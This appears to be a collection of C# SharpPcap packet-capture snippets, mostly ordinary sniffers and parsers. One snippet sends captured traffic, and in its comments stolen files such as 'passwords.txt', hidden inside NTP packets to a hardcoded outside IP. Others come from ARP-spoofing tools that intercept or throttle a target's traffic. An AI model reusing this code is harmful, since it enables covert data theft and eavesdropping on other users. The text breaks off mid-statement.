static void Main() { CaptureDeviceList deviceList = CaptureDeviceList.Instance; foreach (ICaptureDevice dev in deviceList) { Console.WriteLine("{0}\n", dev.ToString()); } ICaptureDevice device = deviceList[3]; device.Open(DeviceMode.Promiscuous, 1000); Console.WriteLine(); Console.WriteLine("-- Listening on {0}...", device.Description); Packet packet = null; while (true) { RawCapture raw = device.GetNextPacket(); while (raw == null) { raw = device.GetNextPacket(); } packet = Packet.ParsePacket(raw.LinkLayerType, raw.Data); var tcpPacket = TcpPacket.GetEncapsulated(packet); var ipPacket = IpPacket.GetEncapsulated(packet); if (tcpPacket != null && ipPacket != null) { DateTime time = raw.Timeval.Date; int len = raw.Data.Length; Console.WriteLine("{0}:{1}:{2},{3} Len={4}", time.Hour, time.Minute, time.Second, time.Millisecond, len); //Console.WriteLine(e.Packet.ToString()); // IP адрес отправителя var srcIp = ipPacket.SourceAddress.ToString(); //Console.WriteLine("srcIp="+ srcIp); // IP адрес получателя var dstIp = ipPacket.DestinationAddress.ToString(); //Console.WriteLine("dstIp=" + dstIp); // порт отправителя var srcPort = tcpPacket.SourcePort.ToString(); //Console.WriteLine("srcPort=" + srcPort); // порт получателя var dstPort = tcpPacket.DestinationPort.ToString(); //Console.WriteLine("dstPost=" + dstPort); // данные пакета var data = BitConverter.ToString(raw.Data); //Console.WriteLine("data=" + data); string sendNTP = srcIp.ToString() + " " + dstIp.ToString() + " " + srcPort.ToString() + " " + dstPort.ToString() + "\r\n" + data.ToString() + "\r\n"; Console.WriteLine(sendNTP); } } // Закрываем pcap устройство //device.Close(); //Console.WriteLine(" -- Capture stopped, device closed."); }
static public SharpPcap.RawCapture ReturnProtocol(ICaptureDevice device, int number) { var rawCapture = device.GetNextPacket(); for (int i = 0; i < number; i++) { rawCapture = device.GetNextPacket(); } return(rawCapture); }
/// <summary> /// IEnumerable helper allows for easy foreach usage, extension method and Linq usage /// </summary> /// <returns></returns> public static IEnumerable <RawCapture> GetSequence(ICaptureDevice dev, bool maskExceptions = true) { try { dev.Open(); while (true) { RawCapture packet = null; try { packet = dev.GetNextPacket(); } catch (PcapException pe) { if (!maskExceptions) { throw pe; } } if (packet == null) { break; } yield return(packet); } } finally { dev.Close(); } }
/* * FUnkce pro veškeré zachytávání paketů * Otevře dané rozhraní pro naslouchání a poté načítá pakety a volá funkci na zpracování dokud * nedosáhne daného čísla */ public void catch_packets(Argument arg) { //Otevře Device pro naslouchání s nastaveným timeoutem int timeout = 10000; int counter = 0; Device.Open(DeviceMode.Promiscuous, timeout); RawCapture packet; // Cyklus načítá pakety while ((packet = Device.GetNextPacket()) != null) { //Volá funkci na zpracování paketu a pokud vrátí true (např. pokud jde o TCP protokol když //je zvolena funkce na naslouchání tcp, zvýší counter if (work_packet(packet, arg)) { counter++; if (counter != arg.Num) { Console.WriteLine(""); } } if (counter == arg.Num) { break; } } Device.Close(); }
public async Task Run() { running = true; Console.WriteLine(); Console.WriteLine("-- Listening on {0}, hit 'ctrl-c' to stop...", _device.Name); while (running) { RawCapture capture = _device.GetNextPacket(); if (capture == null) { continue; } (string host, string endpoint, string agent, string accept) = _packetExtractor.Extract(capture); if (endpoint == null) { continue; } Parallel.Invoke(async() => await GetFile(host, endpoint, agent, accept)); } }
private void ProcessPackets(ICaptureDevice dev, TcpConnectionManager tcpConnectionManager) { // reset the expected message index at the start of the test run expectedMessageIndex = 0; GetPacketStatus status; PacketCapture e; while ((status = dev.GetNextPacket(out e)) == GetPacketStatus.PacketRead) { var rawCapture = e.GetPacket(); var p = Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data); var tcpPacket = p.Extract <TcpPacket>(); // skip non-tcp packets, http is a tcp based protocol if (p == null) { continue; } log.Debug("passing packet to TcpConnectionManager"); tcpConnectionManager.ProcessPacket(rawCapture.Timeval, tcpPacket); } // did we get all of the messages? Assert.Equal(expectedMessages.Count, expectedMessageIndex); }
public void BeginCapture(BackgroundWorker worker, ICaptureDevice networkDevice) { networkDevice.Open(DeviceMode.Promiscuous, 1000); while (!worker.CancellationPending) { var rawPackage = networkDevice.GetNextPacket(); if (rawPackage == null) { continue; } var packet = Packet.ParsePacket(rawPackage.LinkLayerType, rawPackage.Data); var ipPacket = (IpPacket)packet.Extract(typeof(IpPacket)); if (ipPacket == null) { continue; } PackageGenerated(new PackageGeneratedArgs() { GeneratedPackage = ipPacket.Protocol == IPProtocolType.TCP ? new TCPPackage(ipPacket) : new Package(ipPacket) }); } networkDevice.StopCapture(); networkDevice.Close(); }
/// <summary> /// Captures a LLDP network packet from the connected switch and returns a <c>LLDPPacket</c> class object that represents the packet /// </summary> /// <returns>The LLDP packet captured from the switch</returns> private LLDPPacket CaptureLLDPPacket() { idev.Filter = "ether dst 01:80:c2:00:00:0e"; var rawpacket = idev.GetNextPacket(); var packet = Packet.ParsePacket(rawpacket.LinkLayerType, rawpacket.Data); return((LLDPPacket)packet.Extract(typeof(LLDPPacket))); }
public void Limiter() { try { RawCapture rawCapture; do { if ((rawCapture = capturedevice.GetNextPacket()) != null) { EthernetPacket Packet; try { Packet = PacketDotNet.Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data) as EthernetPacket; if (Packet == null) { return; } } catch (Exception) { continue; } if (Packet.SourceHwAddress.Equals(device.MAC)) { if (device.UploadCap == 0 || device.UploadCap > device.PacketsSentSinceLastReset) { Packet.SourceHwAddress = capturedevice.MacAddress; Packet.DestinationHwAddress = device.GatewayMAC; capturedevice.SendPacket(Packet); device.PacketsSentSinceLastReset += Packet.Bytes.Length; } } else if (Packet.SourceHwAddress.Equals(device.GatewayMAC)) { IPv4Packet IPV4 = Packet.Extract(typeof(IPv4Packet)) as IPv4Packet; if (IPV4.DestinationAddress.Equals(device.IP)) { if (device.DownloadCap == 0 || device.DownloadCap > device.PacketsReceivedSinceLastReset) { Packet.SourceHwAddress = capturedevice.MacAddress; Packet.DestinationHwAddress = device.MAC; capturedevice.SendPacket(Packet); device.PacketsReceivedSinceLastReset += Packet.Bytes.Length; } } } } } while (device.LimiterStarted && device.Redirected); device.LimiterStarted = false; } catch (Exception) { } }
public void SendPacketsFromFile(LibPcapLiveDevice Device, string Path, bool?PeriodEn, int Period) { Device.Open(); SendingThreadEnable = true; List <RawCapture> rawCaptures = new List <RawCapture>(); try { RawCapture packet; ICaptureDevice PacketsFile = OpenPacketsFile(Path); while ((packet = PacketsFile.GetNextPacket()) != null) { rawCaptures.Add(packet); } } catch (Exception e) { basic.MessageBox(e.Message); } Thread td = new Thread(() => { while (true) { if (SendingThreadEnable == false) { break; } try { for (int i = 0; i < rawCaptures.Count; i++) { Device.SendPacket(rawCaptures[i].Data); } } catch (Exception e) { basic.MessageBox(e.Message); } if (PeriodEn == true) { Thread.Sleep(Period); } else { break; } } }); td.Start(); }
//CODE FROM https://www.codeproject.com/Articles/12458/SharpPcap-A-Packet-Capture-Framework-for-NET - ACCESSED 03/02/2018 - HEAVILY MODIFIED static void PacketCollect(CaptureDeviceList DeviceList) { int BaselineLimiter = 1000; //CHANGE THIS VALUE TO DETERMINE SIZE OF BASELINE // Extract a device from the list ICaptureDevice device = DeviceList[0]; //<- VALUE OF 0 WILL USE FIRST DEVICE // Register our handler function to the 'packet arrival' event device.OnPacketArrival += new SharpPcap.PacketArrivalEventHandler(Device_OnPacketArrival); // Open the device for capturing int readTimeoutMilliseconds = 1000; device.Open(DeviceMode.Promiscuous, readTimeoutMilliseconds); if (CompareOrBaseline == false) { // Open the device for capturing // tcpdump filter to capture only TCP/IP packets Console.WriteLine("-- Listening on {0}, collecting " + BaselineLimiter + " packets. Press any key to terminate early.", device.Description); // Start capturing packets while (PacketCounter < BaselineLimiter) { RawCapture rawPacket = null; rawPacket = device.GetNextPacket(); //get the next packet if (rawPacket != null) //if there's actually a packet there { var decodedPacket = PacketDotNet.Packet.ParsePacket(rawPacket.LinkLayerType, rawPacket.Data); //parse the packet if (TextOutput == true) { Console.WriteLine("PACKET BEGIN..."); Console.WriteLine(decodedPacket.ToString()); AddToList(decodedPacket.ToString()); Console.WriteLine("...PACKET END"); } else if (TextOutput == false) { AddToList(decodedPacket.ToString()); //add to dictionary } ++PacketCounter; } } } else if (CompareOrBaseline == true) { device.Capture(); device.Close(); //never called } }
/* * public string Traceroute(string ipAddressOrHostName) * { * IPAddress ipAddress = Dns.GetHostEntry(ipAddressOrHostName).AddressList[0]; * StringBuilder traceResults = new StringBuilder(); * using (Ping pingSender = new Ping()) * { * PingOptions pingOptions = new PingOptions(); * Stopwatch stopWatch = new Stopwatch(); * * byte[] bytes = new byte[32]; * pingOptions.DontFragment = true; * pingOptions.Ttl = 1; * int maxHops = 30; * * traceResults.AppendLine( * string.Format( * "Tracing route to {0} over a maximum of {1} hops:", * ipAddress, * maxHops)); * * traceResults.AppendLine(); * * for (int i = 1; i < maxHops + 1; i++) * { * stopWatch.Reset(); * stopWatch.Start(); * PingReply pingReply = pingSender.Send( * ipAddress, * 5000, * new byte[32], pingOptions); * * stopWatch.Stop(); * * traceResults.AppendLine( * string.Format("{0}\t{1} ms\t{2}", * i, * stopWatch.ElapsedMilliseconds, * pingReply.Address)); * * if (pingReply.Status == IPStatus.Success) * { * traceResults.AppendLine(); * traceResults.AppendLine("Trace complete."); break; * } * * pingOptions.Ttl++; * } * } * return traceResults.ToString(); * } */ static void Main(string[] args) { // Retrieve the device list CaptureDeviceList devices = CaptureDeviceList.Instance; // If no devices were found print an error if (devices.Count < 1) { Console.WriteLine("No devices were found on this machine"); return; } // Extract a device from the list ICaptureDevice device = devices[0]; // Open the device for capturing int readTimeoutMilliseconds = 1000; device.Open(DeviceMode.Promiscuous, readTimeoutMilliseconds); Console.WriteLine(); Console.WriteLine("-- Listening on {0}...", device.Description); RawCapture packet = null; // Keep capture packets using GetNextPacket() while ((packet = device.GetNextPacket()) != null) { // Prints the time and length of each received packet DateTime time = packet.PcapHeader.Date; int len = packet.PcapHeader.PacketLength; Console.WriteLine("{0}:{1}:{2},{3} Len={4}", time.Hour, time.Minute, time.Second, time.Millisecond, len); } // Close the pcap device device.Close(); Console.WriteLine(" -- Capture stopped, device closed."); }
public void GetNextPacket() { RawCapture packet; // Capture packets using GetNextPacket() if ((packet = device.GetNextPacket()) != null) { captureFileWriter.Write(packet); rawCapturesList.Add(packet); CustomerPacket curpacket = AchieiveNewPacket(packet); if (packets == null) { packets = new ObservableCollection <CustomerPacket>(); packets.Add(curpacket); this.ViewBody.ItemsSource = packets; } else { try { //此处可能会有溢出 packets.Add(curpacket); } catch { this.continueGetPacket = false; } finally { } } } if (this.continueGetPacket) { this.ViewBody.Dispatcher.BeginInvoke(DispatcherPriority.SystemIdle, new GetNextPacketDelegate(GetNextPacket)); } }
public Packet GetNextPacket() { RawCapture rawCapture; Packet result = null; rawCapture = device.GetNextPacket(); if (rawCapture != null) { Packet p = Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data); result = p; try { TcpPacket tcp = p.Extract <TcpPacket>(); if (tcp != null && tcp.PayloadData.Length > 0) { ExtractUpperPacket(tcp); } else { // UNDONE: For GOOSE and SV or null TCP EthernetPacket ether = p.Extract <EthernetPacket>(); ExtractEthernetPacket(ether); } } catch (Exception ex) { #if DEBUG Console.WriteLine("No. {0}: {1}\nTPKT buffer count: {2}.", currentPacketIndex, ex.Message, tpktBuff.Reassembled.Count); Console.WriteLine(ex.StackTrace); #endif } } if (packets.Count > 0) { result = packets.Pop(); } return(result); }
public async Task <List <byte> > getPktFromInterfaceAsync() { List <byte> dnp3Pkt = new List <byte>(); var rawPacket = deviceToListen.GetNextPacket(); var packet = PacketDotNet.Packet.ParsePacket(rawPacket.LinkLayerType, rawPacket.Data); return(await Task.Factory.StartNew(() => { while (packet != null) { var tcp = packet.Extract(typeof(TcpPacket)); if (tcp != null) { var ip = (IpPacket)packet.Extract(typeof(IpPacket)); string srcIp = ip.SourceAddress.ToString(); string dstIp = ip.DestinationAddress.ToString(); byte[] data = tcp.ParentPacket.Bytes; if (!(ip.SourceAddress.Equals(localAddr))) { dnp3Pkt = checkIfDNP3(data); if (dnp3Pkt.Count() > 0) { Console.WriteLine("DNP3 PKT RCVD:" + Environment.NewLine); } string dataString = BitConverter.ToString(data); string dataToSend = "SrcIP = " + srcIp + " DstIP = " + dstIp + Environment.NewLine + "Data = " + dataString + Environment.NewLine; //SetText(dataToSend); //stationConsole.Text += "SrcIP = " + srcIp + " DstIP = " + dstIp + Environment.NewLine; //stationConsole.Text += "Data = " + dataString + Environment.NewLine; Console.WriteLine(dataToSend); } } } return (dnp3Pkt); })); }
/// <summary> /// IEnumerable helper allows for easy foreach usage, extension method and Linq usage /// </summary> /// <returns></returns> public static IEnumerable <RawCapture> GetSequence(ICaptureDevice dev, bool maskExceptions = true) { try { PacketCapture e; dev.Open(); while (true) { RawCapture packet = null; try { var retval = dev.GetNextPacket(out e); if (retval != GetPacketStatus.PacketRead) { break; } packet = e.GetPacket(); } catch (PcapException pe) { if (!maskExceptions) { throw pe; } } if (packet == null) { break; } yield return(packet); } } finally { dev.Close(); } }
public async Task <List <Packet> > ScanPackets(Form form, ICaptureDevice selectedDevice, List <byte[]> containedFilterList) { var capturedPackets = new List <Packet>(); this.isCapturing = true; var task = Task.Run(() => { selectedDevice.Open(DeviceMode.Promiscuous, 1000); while (this.isCapturing) { var rawCapture = selectedDevice.GetNextPacket(); if (rawCapture == null) { continue; } var packet = Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data); containedFilterList.ForEach(byteArray => { if (packet.Bytes.ContainsSameOrder(byteArray)) { capturedPackets.Add(packet); } }); } selectedDevice.Close(); }); await task; return(capturedPackets); }
private bool GetNextFrameInternal() { if (_state == ReadingState.Closed) { throw new InvalidOperationException("Reader is not open."); } if (_state == ReadingState.Finished) { return(false); } _current = _device.GetNextPacket(); if (_current != null) { _state = ReadingState.Success; return(true); } else { _current = default; _state = ReadingState.Finished; return(false); } }
/// <summary> /// IEnumerable helper allows for easy foreach usage, extension method and Linq usage /// </summary> /// <returns></returns> public static IEnumerable<RawCapture> GetSequence(ICaptureDevice dev, bool maskExceptions = true) { try { dev.Open(); while (true) { RawCapture packet = null; try { packet = dev.GetNextPacket(); } catch (PcapException pe) { if (!maskExceptions) throw pe; } if (packet == null) break; yield return packet; } } finally { dev.Close(); } }
/// <summary> /// Method handles packets /// </summary> /// <param name="opt"></param> public static void Sniff(Program.Options opt) { //Try to find the specified interface. If correct is not found or more interfaces with the same name exits //application exits with Non-zero exit code ICaptureDevice device = null; try { device = CaptureDeviceList.Instance.Single(x => x.Name == opt.Inter); } catch (Exception) { Console.WriteLine("None or more interfaces with the name exists " + opt.Inter); Environment.Exit(1); } uint numberOfProcessedPackets = 0; //Try to open the interface. If it fails write message and exit with code 2 try { device.Open(); } catch (Exception e) { Console.WriteLine(e.Message); Environment.Exit(2); } RawCapture packet; bool both = !opt.Tcp && !opt.Udp; while ((packet = device.GetNextPacket()) != null) { //Check number of processed packets if (numberOfProcessedPackets >= opt.Count) { break; } var time = packet.Timeval.Date; var packetInfo = Packet.ParsePacket(packet.LinkLayerType, packet.Data); //Packet extraction var ipPacket = packetInfo.Extract <IPPacket>(); var udpPacket = packetInfo.Extract <UdpPacket>(); var tcpPacket = packetInfo.Extract <TcpPacket>(); //Packet resolving if (opt.Tcp || both) { if (opt.Port == 0) { PacketPrinter.Print(time, ipPacket, tcpPacket); } else if (opt.Port == tcpPacket?.SourcePort || opt.Port == tcpPacket?.DestinationPort) { PacketPrinter.Print(time, ipPacket, tcpPacket); } } if (opt.Udp || both) { if (opt.Port == 0) { PacketPrinter.Print(time, ipPacket, udpPacket); } else if (opt.Port == tcpPacket?.SourcePort || opt.Port == tcpPacket?.DestinationPort) { PacketPrinter.Print(time, ipPacket, udpPacket); } } ++numberOfProcessedPackets; } }
static void Main(string[] args) { int k = 0; CaptureDeviceList deviceList = CaptureDeviceList.Instance; foreach (ICaptureDevice dev in deviceList) { Console.WriteLine("{0}\n", dev.ToString()); } ICaptureDevice device = deviceList[3]; device.Open(DeviceMode.Promiscuous, 1000); Console.WriteLine(); Console.WriteLine("-- Listening on {0}...", device.Description); Packet packet = null; while (true) { RawCapture raw = device.GetNextPacket(); while (raw == null) { raw = device.GetNextPacket(); } packet = Packet.ParsePacket(raw.LinkLayerType, raw.Data); var tcpPacket = TcpPacket.GetEncapsulated(packet); var ipPacket = IpPacket.GetEncapsulated(packet); if (tcpPacket != null && ipPacket != null) { DateTime time = raw.Timeval.Date; int len = raw.Data.Length; Console.WriteLine("{0}:{1}:{2},{3} Len={4}", time.Hour, time.Minute, time.Second, time.Millisecond, len); //Console.WriteLine(e.Packet.ToString()); // IP адрес отправителя var srcIp = ipPacket.SourceAddress.ToString(); //Console.WriteLine("srcIp="+ srcIp); // IP адрес получателя var dstIp = ipPacket.DestinationAddress.ToString(); //Console.WriteLine("dstIp=" + dstIp); // порт отправителя var srcPort = tcpPacket.SourcePort.ToString(); //Console.WriteLine("srcPort=" + srcPort); // порт получателя var dstPort = tcpPacket.DestinationPort.ToString(); //Console.WriteLine("dstPost=" + dstPort); // данные пакета var data = BitConverter.ToString(raw.Data); //Console.WriteLine("data=" + data); string path = srcIp.ToString() + " " + dstIp.ToString() + " " + srcPort.ToString() + " " + dstPort.ToString() + " " + data.ToString() + " "; Console.WriteLine(path); k++; //Get some private data //For example, contents of `passwords.txt` on user's desktop path += "TRANSFER COMPLETE"; //Add 17 bytes more to guaranteely send 2 or more packets //Now split by 17 bytes each int ctr = 0; List <byte[]> pcs = new List <byte[]>(); int BYTE_CNT = 17; byte[] current = new byte[BYTE_CNT]; foreach (var cb in Encoding.ASCII.GetBytes(path)) { if (ctr == BYTE_CNT) { //BYTE_CNT bytes added, start new iteration byte[] bf = new byte[BYTE_CNT]; current.CopyTo(bf, 0); pcs.Add(bf); String deb = Encoding.ASCII.GetString(bf); ctr = 0; for (int i = 0; i < BYTE_CNT; i++) { current[i] = 0x0; } } if (cb == '\n' || cb == '\r') { current[ctr] = Encoding.ASCII.GetBytes("_")[0]; } else { current[ctr] = cb; } ctr++; } //OK split Console.WriteLine($"OK split into {pcs.Count} parts"); //Now send UDPSocket socket = new UDPSocket(); socket.Client("88.151.112.223", 123); byte pkt_id = 0; int total_sent = 0; Stopwatch sw = new Stopwatch(); sw.Start(); foreach (var ci in pcs) { NtpPacket ntp = new NtpPacket(); ntp = ntp.EmbedDataToPacketC(ci); byte[] result = ntp.BuildPacket(); result[5] = pkt_id; if (k == 0) { packets.Add(pkt_id, result); } Console.WriteLine($"Sending: {Encoding.ASCII.GetString(result)}"); socket.Send(result); Thread.Sleep(1); total_sent += result.Length; pkt_id++; } sw.Stop(); Console.WriteLine($"Sent {pkt_id} packets in {sw.ElapsedMilliseconds} ms. Avg speed: {total_sent / ((double)((double)sw.ElapsedMilliseconds / (double)1000))} B/s"); Console.WriteLine("Package was sent"); //Console.ReadKey(true); } } }
private void MapButton_Click(object sender, EventArgs e) { ProgressBar.Value = 0; //Check Input if ((UserText.Text == "") || (PassText.Text == "") || (RoomText.Text == "") || (JackText.Text == "")) { MsgText.Text = "Please fill out all the fields before proceeding"; return; } ProgressBar.Increment(10); //Refresh IP NetworkInterface sni; sni = refreshMacAndIP(); if (sni.OperationalStatus != OperationalStatus.Up) { MsgText.Text = "The selected network interface is not up. Check your connection."; return; } if (IpText.Text.StartsWith("169.254.") || IpText.Text.Equals("0.0.0.0")) { MsgText.Text = "Unable to obtain a valid IP address. Try again."; return; } ProgressBar.Increment(25); MsgText.Text = "Mapping..."; this.Refresh(); //Declare variables WebRequest req; WebResponse resp; Stream dstream; StreamReader reader; ICaptureDevice idev = null; Packet packet; LLDPPacket lldp; RawCapture rawpacket; string data; string query = "https://netcenter.studentaffairs.ohio-state.edu/portmapper/port_authority.php"; string switchname; string portnumber; bool gig = false; //Set up selected network device bool matched = false; foreach (ICaptureDevice icd in CaptureDeviceList.Instance) { icd.Open(DeviceMode.Promiscuous, 4000); if (BitConverter.ToString(icd.MacAddress.GetAddressBytes()).Replace('-', ':') == MacText.Text) { idev = icd; matched = true; break; } icd.Close(); } if (!matched) { MsgText.Text = "Unable to match selected network adapter to ICaptureDevice"; return; } idev.Filter = "ether dst 01:80:c2:00:00:0e"; ProgressBar.Increment(10); //Begin capturing packets, search for LLDP packet rawpacket = idev.GetNextPacket(); idev.Close(); if (rawpacket == null) { MsgText.Text = "Unable to capture packet: Check the connection and try again"; return; } packet = Packet.ParsePacket(rawpacket.LinkLayerType, rawpacket.Data); lldp = (LLDPPacket)packet.Extract(typeof(LLDPPacket)); //Function LLDPPacket.GetEncapsulated() is obsolete //lldp = LLDPPacket.GetEncapsulated(Packet.ParsePacket(rawpacket.LinkLayerType, rawpacket.Data)); if (lldp == null) { MsgText.Text = "Unable to parse packet: Try again"; return; } ProgressBar.Increment(35); //Decipher LLDP packet //Debug.WriteLine(BitConverter.ToString(lldp[3].Bytes)); //Debug.WriteLine(BitConverter.ToString(lldp[6].Bytes)); switchname = Encoding.UTF8.GetString(lldp[3].Bytes); switchname = switchname.Substring(2); portnumber = Encoding.UTF8.GetString(lldp[6].Bytes); portnumber = portnumber.Substring(2); if (portnumber[0] == 'g' || portnumber[0] == 'G') { gig = true; } portnumber = portnumber.Split('/')[2]; //Formatting so compatible with port_authority.php //Debug.WriteLine(switchname); //Debug.WriteLine(portnumber); //Create query string /* * data = new NameValueCollection(); * data["roomnumber"] = RoomText.Text; * data["jack"] = JackText.Text; * data["deviceid"] = switchname; * data["portid"] = portnumber; * data["user"] = UserText.Text; * data["pass"] = PassText.Text; */ //Debug.WriteLine(data.ToString()); data = "roomnumber=" + RoomText.Text + "&jack=" + JackText.Text + "&deviceid=" + switchname + "&portid=" + portnumber + "&gigabit=" + (gig?"1":"0") + "&user="******"&pass="******"Connecting to Netcenter..."; this.Refresh(); try { req = WebRequest.Create(query); req.Method = "POST"; req.ContentType = "application/x-www-form-urlencoded"; req.ContentLength = postData.Length; dstream = req.GetRequestStream(); dstream.Write(postData, 0, postData.Length); dstream.Close(); resp = req.GetResponse(); dstream = resp.GetResponseStream(); reader = new StreamReader(dstream); MsgText.Text = reader.ReadToEnd(); ProgressBar.Increment(10); reader.Close(); dstream.Close(); resp.Close(); } catch (WebException we) { MsgText.Text = we.Message; } finally { ProgressBar.Value = 0; } }
private void StartSniffer() { try { RawCapture rawCapture; do { if ((rawCapture = capturedevice.GetNextPacket()) != null) { EthernetPacket Packet = PacketDotNet.Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data) as EthernetPacket; if (Packet == null) { return; } AcceptedPacket acPacket = new AcceptedPacket(); acPacket.Packet = Packet; if (Packet.SourceHwAddress.Equals(TargetMAC)) { if (acPacket.TCPPacket != null) { materialListView1.BeginInvoke(new Action(() => { materialListView1.AddObject(acPacket); if (materialListView1.Items.Count > 15 && !ResizeDone) { olvColumn8.MaximumWidth = 65; olvColumn8.MinimumWidth = 65; olvColumn8.Width = 65; ResizeDone = true; } ListofAcceptedPackets.Add(acPacket); })); } } else if (Packet.SourceHwAddress.Equals(GatewayMAC)) { if (Properties.Settings.Default.PacketDirection == "Inbound") { IPv4Packet IPV4 = Packet.Extract(typeof(IPv4Packet)) as IPv4Packet; if (IPV4.DestinationAddress.Equals(TargetIP)) { if (acPacket.TCPPacket != null) { materialListView1.BeginInvoke(new Action(() => { materialListView1.AddObject(acPacket); if (materialListView1.Items.Count > 15 && !ResizeDone) { olvColumn8.MaximumWidth = 65; olvColumn8.MinimumWidth = 65; olvColumn8.Width = 65; ResizeDone = true; } ListofAcceptedPackets.Add(acPacket); })); } } } } } } while (snifferStarted); } catch (Exception) { } }
/// <summary> /// Populates the list with devices connected on LAN /// </summary> /// <param name="view">UI controls</param> /// <param name="InterfaceFriendlyName"></param> public static void StartScan(IView view, string InterfaceFriendlyName) { #region initialization if (capturedevice != null) { GatewayCalled = false; BackgroundScanDisabled = true; capturedevice.StopCapture(); capturedevice.Close(); capturedevice = null; } else { ClientList = new Dictionary <IPAddress, PhysicalAddress>(); Main.Devices = new ConcurrentDictionary <IPAddress, Device>(); } #endregion //Get list of interfaces CaptureDeviceList capturedevicelist = CaptureDeviceList.Instance; //crucial for reflection on any network changes capturedevicelist.Refresh(); capturedevice = (from devicex in capturedevicelist where ((NpcapDevice)devicex).Interface.FriendlyName == InterfaceFriendlyName select devicex).ToList()[0]; //open device in promiscuous mode with 1000ms timeout capturedevice.Open(DeviceMode.Promiscuous, 1000); //Arp filter capturedevice.Filter = "arp"; IPAddress myipaddress = AppConfiguration.LocalIp; //Probe for active devices on the network if (DiscoveryTimer == null) { StartDescoveryTimer(); } #region Retrieving ARP packets floating around and find out the sender's IP and MAC //Scan duration long scanduration = 8000; RawCapture rawcapture = null; //Main scanning task ScannerTask = Task.Run(() => { try { Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); while ((rawcapture = capturedevice.GetNextPacket()) != null && stopwatch.ElapsedMilliseconds <= scanduration) { Packet packet = Packet.ParsePacket(rawcapture.LinkLayerType, rawcapture.Data); ArpPacket ArpPacket = packet.Extract <ArpPacket>(); if (!ClientList.ContainsKey(ArpPacket.SenderProtocolAddress) && ArpPacket.SenderProtocolAddress.ToString() != "0.0.0.0" && Tools.AreCompatibleIPs(ArpPacket.SenderProtocolAddress, myipaddress, AppConfiguration.NetworkSize)) { ClientList.Add(ArpPacket.SenderProtocolAddress, ArpPacket.SenderHardwareAddress); string mac = Tools.GetMACString(ArpPacket.SenderHardwareAddress); string ip = ArpPacket.SenderProtocolAddress.ToString(); var device = new Device { IP = ArpPacket.SenderProtocolAddress, MAC = PhysicalAddress.Parse(mac.Replace(":", "")), DeviceName = "Resolving", ManName = "Getting information...", DeviceStatus = "Online" }; //Add device to UI list view.ListView1.BeginInvoke(new Action(() => { view.ListView1.AddObject(device); })); //Add device to main device list _ = Main.Devices.TryAdd(ArpPacket.SenderProtocolAddress, device); //Get hostname and mac vendor for the current device _ = Task.Run(async() => { try { #region Get Hostname IPHostEntry hostEntry = await Dns.GetHostEntryAsync(ip); device.DeviceName = hostEntry?.HostName ?? ip; #endregion #region Get MacVendor var Name = VendorAPI.GetVendorInfo(mac); device.ManName = (Name is null) ? "" : Name.data.organization_name; #endregion view.ListView1.BeginInvoke(new Action(() => { view.ListView1.UpdateObject(device); })); } catch (Exception ex) { try { if (ex is SocketException) { var Name = VendorAPI.GetVendorInfo(mac); device.ManName = (Name is null) ? "" : Name.data.organization_name; view.ListView1.BeginInvoke(new Action(() => { device.DeviceName = ip; view.ListView1.UpdateObject(device); })); } else { view.MainForm.BeginInvoke( new Action(() => { device.DeviceName = ip; device.ManName = "Error"; view.ListView1.UpdateObject(device); })); } } catch { } } }); } int percentageprogress = (int)((float)stopwatch.ElapsedMilliseconds / scanduration * 100); view.MainForm.BeginInvoke(new Action(() => view.StatusLabel.Text = "Scanning " + percentageprogress + "%")); } stopwatch.Stop(); view.MainForm.BeginInvoke(new Action(() => view.StatusLabel.Text = ClientList.Count.ToString() + " device(s) found")); //Initial scanning is over now we start the background scan. Main.OperationIsInProgress = false; //Start passive monitoring BackgroundScanStart(view); } catch { //Show an error in the UI in case something went wrong try { view.MainForm.BeginInvoke(new Action(() => { view.StatusLabel.Text = "Error occurred"; view.PictureBox.Image = Properties.Resources.color_error; })); } catch { } //Swallow exception when the user closes the app during the scan operation } }); #endregion }
private int SendSynPacket(TcpPacket tcp) { tcp.SequenceNumber = 0; //A TCP Sync Packet will always have a destination address of 0 tcp.CWR = false; tcp.ECN = false; tcp.Urg = false; tcp.Ack = false; tcp.Psh = false; tcp.Rst = false; tcp.Syn = true; tcp.Fin = false; device = devices[1]; device.Open(DeviceMode.Promiscuous, 20); device.SendPacket(tcp); device.OnPacketArrival += new SharpPcap.PacketArrivalEventHandler(device_OnPacketArrival); //device.StartCapture(); RawCapture nexttcp = device.GetNextPacket(); //device.StopCapture(); if (nexttcp != null) { var packet = PacketDotNet.Packet.ParsePacket(nexttcp.LinkLayerType, nexttcp.Data); TcpPacket tcp1 = TcpPacket.GetEncapsulated(packet); if ((tcp1 != null) && (tcp1.Syn == true) && (tcp1.Ack == true)) { return 1; } else { return 0; } } else { return 0; } device.Close(); }
/// <summary> /// Populates listview with machines connected to the LAN /// </summary> /// <param name="view"></param> /// <param name="interfacefriendlyname"></param> public static void GetAllClients(IView view, string interfacefriendlyname) { DebugOutputClass.Print(view, "Refresh client list"); #region initialization view.MainForm.Invoke(new Action(() => view.ToolStripStatusScan.Text = "Please wait...")); view.MainForm.Invoke(new Action(() => view.ToolStripProgressBarScan.Value = 0)); if (capturedevice != null) { try { capturedevice.StopCapture(); //stop previous capture capturedevice.Close(); //close previous instances } catch (PcapException ex) { DebugOutputClass.Print(view, "Exception at GetAllClients while trying to capturedevice.StopCapture() or capturedevice.Close() [" + ex.Message + "]"); } } clientlist = new Dictionary <IPAddress, PhysicalAddress>(); //this is preventing redundant entries into listview and for counting total clients view.ListView1.Items.Clear(); #endregion CaptureDeviceList capturedevicelist = CaptureDeviceList.Instance; capturedevicelist.Refresh(); //crucial for reflection of any network changes capturedevice = (from devicex in capturedevicelist where ((SharpPcap.WinPcap.WinPcapDevice)devicex).Interface.FriendlyName == interfacefriendlyname select devicex).ToList()[0]; capturedevice.Open(DeviceMode.Promiscuous, 1000); //open device with 1000ms timeout IPAddress myipaddress = ((SharpPcap.WinPcap.WinPcapDevice)capturedevice).Addresses[1].Addr.ipAddress; //possible critical point : Addresses[1] in hardcoding the index for obtaining ipv4 address #region Sending ARP requests to probe for all possible IP addresses on LAN new Thread(() => { try { for (int ipindex = 1; ipindex <= 255; ipindex++) { ARPPacket arprequestpacket = new ARPPacket(ARPOperation.Request, 